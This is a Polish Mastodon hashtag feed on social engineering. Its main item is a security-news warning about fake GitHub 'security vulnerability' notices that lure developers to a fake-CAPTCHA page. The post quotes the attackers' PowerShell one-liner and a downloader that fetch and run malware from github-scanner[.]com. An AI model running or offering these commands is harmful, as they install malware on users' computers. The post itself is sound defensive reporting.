Fosstodon

0 posts0 participants0 posts today

sekurak NewsHistoria o tym jak twórca HaveIBeenPwned trafił do własnej bazy weryfikacji wycieków ;-)Nie ma co ukrywać, że nabranie się na phishing nie dotyczy tylko przeciętnych niezwiązanych z cyberbezpieczeństwem Kowalskich, ale także ludzi zawodowo związanych z bezpieczeństwem IT. Nigdy nie jesteś wystarczająco czujny, aby odsiać każdą podejrzaną wiadomość.  Możecie spytać Troya Hunta – stanowczo potwierdzi! ;) Jeśli nie słyszeliście dotąd o dzisiejszym bohaterze...<a href="https://mastodon.com.pl/tags/WBiegu" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#WBiegu</a> <a href="https://mastodon.com.pl/tags/HIBP" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#HIBP</a> <a href="https://mastodon.com.pl/tags/Phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Phishing</a> <a href="https://mastodon.com.pl/tags/Socjotechnika" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Socjotechnika</a> <a href="https://mastodon.com.pl/tags/Troyhunt" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Troyhunt</a> <a href="https://mastodon.com.pl/tags/Wyciek" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Wyciek</a><a href="https://sekurak.pl/historia-o-tym-jak-tworca-haveibeenpwned-trafil-do-wlasnej-bazy-weryfikacji-wyciekow/" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://sekurak.pl/historia-o-tym-jak-tworca-haveibeenpwned-trafil-do-wlasnej-bazy-weryfikacji-wyciekow/</a>

Niebezpiecznik NewsUwaga programiści! Ktoś wysyła cwane komunikaty przez GitHubaJak informują nas programiści posiadający konto na GitHubie, od wczoraj otrzymują powiadomienia o następującej treści: fot. przesłana prze z Jana Hey there! We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue. Best regards, Github Security Team Powiadomienia są triggerowane przez dodanie (a następnie usunięcie) tzw. “issue” do projektu. Gdzie prowadzi link? Ano do strony, która próbuje na programiście wykonać atak “na CAPTCHA” opisywany przez nas ponad 2 tygodnie temu w ramach CyberAlertu. Ofiara widzi to:Kliknięcie w przycisk na pierwszym ekranie kopiuje do schowka ofiary następującą komendę: powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: XXXXXX" A zastosowanie się do instrukcji widocznej na kolejnym ekranie uruchamia powyższą komendę, czyli w konsekwencji następujący kod infekujący komputer ofiary złośliwym oprogramowaniem: $webClient = New-Object System.Net.WebClient $url1 = "https://github-scanner[.]com/l6E.exe" $filePath1 = "$env:TEMP\SysSetup.exe" $webClient.DownloadFile($url1, $filePath1) Start-Process -FilePath $env:TEMP\SysSetup.exe Szczerze mówiąc, trochę nas dziwi dobór ofiar. Programiści akurat są świadomi, co robi skrót WIN+R. Z drugiej jednak strony, zainfekować programistę popularnego projektu na GitHubie to jak wygrać w totka… Na jakie jeszcze ataki powinni uważać programiści? Jeśli chcesz poznać wszystkie ataki, na które powinni być wyczuleni programiści aplikacji webowych, to wpadnij na nasze szkolenie z “Atakowanie i Ochrony Webaplikacji”. To dwa dni pełne praktyki [...]<a href="https://mastodon.com.pl/tags/Ataki" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Ataki</a> <a href="https://mastodon.com.pl/tags/Captcha" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Captcha</a> <a href="https://mastodon.com.pl/tags/GitHub" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#GitHub</a> <a href="https://mastodon.com.pl/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Malware</a> <a href="https://mastodon.com.pl/tags/Phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Phishing</a> <a href="https://mastodon.com.pl/tags/Programista" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Programista</a> <a href="https://mastodon.com.pl/tags/Programowanie" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Programowanie</a> <a href="https://mastodon.com.pl/tags/Socjotechnika" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Socjotechnika</a><a href="https://niebezpiecznik.pl/post/uwaga-programisci-ktos-wysyla-cwane-komunikaty-przez-githuba/" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://niebezpiecznik.pl/post/uwaga-programisci-ktos-wysyla-cwane-komunikaty-przez-githuba/</a>

prywatnie.euCzy wiesz, jak przestępcy wykorzystują Twoją psychologię w cyberatakach?Odkryj sekrety socjotechniki i zabezpiecz swoje dane! 🛡️💻 <a href="https://mastodon.social/tags/Socjotechnika" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Socjotechnika</a> <a href="https://mastodon.social/tags/Cyberbezpiecze%C5%84stwo" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Cyberbezpieczeństwo</a><a href="https://prywatnie.eu/socjotechnika/" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://prywatnie.eu/socjotechnika/</a>

Rafał WileczekKevin Mitnick był w swoim czasie najlepszy, ale to socjotechnika była jego kluczowym narzędziem pracy. O ile – prawdopodobnie – nie był twórcą, to na pewno popularyzatorem stwierdzenia, że najlepszym sposobem pozyskania czyichś wrażliwych danych jest zapytanie o nie wprost. Niewątpliwie skończyła się pewna epoka (jakkolwiek banalnie by to nie zabrzmiało).<a href="https://www.komputerswiat.pl/artykuly/redakcyjne/fbi-polowalo-na-niego-latami-nie-zyje-najslynniejszy-haker-w-historii/txvjx7m" rel="nofollow noopener noreferrer" target="_blank">https://www.komputerswiat.pl/artykuly/redakcyjne/fbi-polowalo-na-niego-latami-nie-zyje-najslynniejszy-haker-w-historii/txvjx7m</a><a href="https://pol.social/tags/KevinMitnick" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#KevinMitnick</a> <a href="https://pol.social/tags/kevinmitnick" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#kevinmitnick</a> <a href="https://pol.social/tags/hacking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#hacking</a> <a href="https://pol.social/tags/socjotechnika" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#socjotechnika</a>

Kuba Orlik(Recepcja w wiezowcu) - dzien dobry, ja do firmy XYZ - jest pan na liscie? - powinienem być - nazwisko? - Orlik - nie ma pana na liście - ale powinienem być - aaa, to prosze wejsc (otwiera bramke)<a href="https://mastodon.host/tags/socjotechnika" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#socjotechnika</a>

Recent searches

Search options

Administered by:

Server stats:

#socjotechnika